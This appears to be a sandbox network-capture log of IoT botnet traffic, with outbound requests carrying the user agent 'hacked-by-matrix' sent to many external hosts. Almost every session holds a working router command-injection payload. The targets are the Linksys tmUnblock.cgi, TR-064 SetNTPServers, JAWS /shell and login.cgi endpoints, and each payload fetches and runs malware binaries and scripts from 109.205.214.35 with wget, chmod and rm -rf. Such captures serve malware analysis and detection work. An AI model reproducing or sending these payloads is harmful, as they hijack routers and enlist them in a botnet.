                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        894192.168.2.1359434172.64.82.1758080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:06.379319906 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:06.896236897 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        895192.168.2.1358282172.65.180.5555555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:06.724857092 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        896192.168.2.1343530172.65.52.24055555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:06.813338041 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        897192.168.2.1354838185.202.178.17680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:07.171505928 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:07.371170044 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:24:20 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        898192.168.2.13487082.140.223.577547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:07.480463982 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:07.726763964 CET684INHTTP/1.1 500 Internal Server Error
                                                        Server: gSOAP/2.7
                                                        Content-Type: text/xml; charset=utf-8
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 43 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 63 77 6d 70 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 63 77 6d 70 2d 31 2d 30 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 53 4f 41 50 2d 45 4e 56 3a 46 61 75 6c 74 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 66 61 75 6c 74 63 6f 64 65 3e 53 4f 41 50 2d 45 4e 56 3a 43 6c 69 65 6e 74 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 3e 4e 6f 20 58 4d 4c 20 65 6c 65 6d 65 6e 74 20 74 61 67 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 46 61 75 6c 74 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"><SOAP-ENV:Body><SOAP-ENV:Fault SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><faultcode>SOAP-ENV:Client</faultcode><faultstring>No XML element tag</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        899192.168.2.1359470172.64.82.1758080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:07.492182970 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        900192.168.2.1359974175.238.89.1347547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:07.500885963 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:09.005492926 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        901192.168.2.1338452172.67.90.1578080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:07.579859972 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        902192.168.2.1339106184.161.13.2448080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:07.701253891 CET110OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        903192.168.2.1339914184.189.45.1438080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:07.708723068 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:07.837249041 CET59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        904192.168.2.1344230172.65.252.19255555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:07.718832970 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        905192.168.2.1357468172.65.14.6655555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:07.718853951 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:23:07.998101950 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        906192.168.2.13487402.140.223.577547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:07.726866961 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:07.974577904 CET684INHTTP/1.1 500 Internal Server Error
                                                        Server: gSOAP/2.7
                                                        Content-Type: text/xml; charset=utf-8
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 43 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 63 77 6d 70 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 63 77 6d 70 2d 31 2d 30 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 53 4f 41 50 2d 45 4e 56 3a 46 61 75 6c 74 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 66 61 75 6c 74 63 6f 64 65 3e 53 4f 41 50 2d 45 4e 56 3a 43 6c 69 65 6e 74 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 3e 4e 6f 20 58 4d 4c 20 65 6c 65 6d 65 6e 74 20 74 61 67 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 46 61 75 6c 74 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:cwmp="urn:dslforum-org:cwmp-1-0"><SOAP-ENV:Body><SOAP-ENV:Fault SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><faultcode>SOAP-ENV:Client</faultcode><faultstring>No XML element tag</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        907192.168.2.133706034.30.78.22680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:07.810996056 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:08.428229094 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:08.545078993 CET337INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.2
                                                        Date: Thu, 21 Mar 2024 04:23:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 173
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        908192.168.2.133938218.67.218.1480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:08.034799099 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:08.382770061 CET1275INHTTP/1.1 400 Bad Request
                                                        Server: CloudFront
                                                        Date: Thu, 21 Mar 2024 04:23:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 915
                                                        Connection: close
                                                        X-Cache: Error from cloudfront
                                                        Via: 1.1 ec37f8318d434db007249052056f9936.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: HAN50-P2
                                                        X-Amz-Cf-Id: _YehCq1PkKEdc30sbSPbSO6GDnXikX3nVqLwsjdOZoU5l9UNlPA34g==
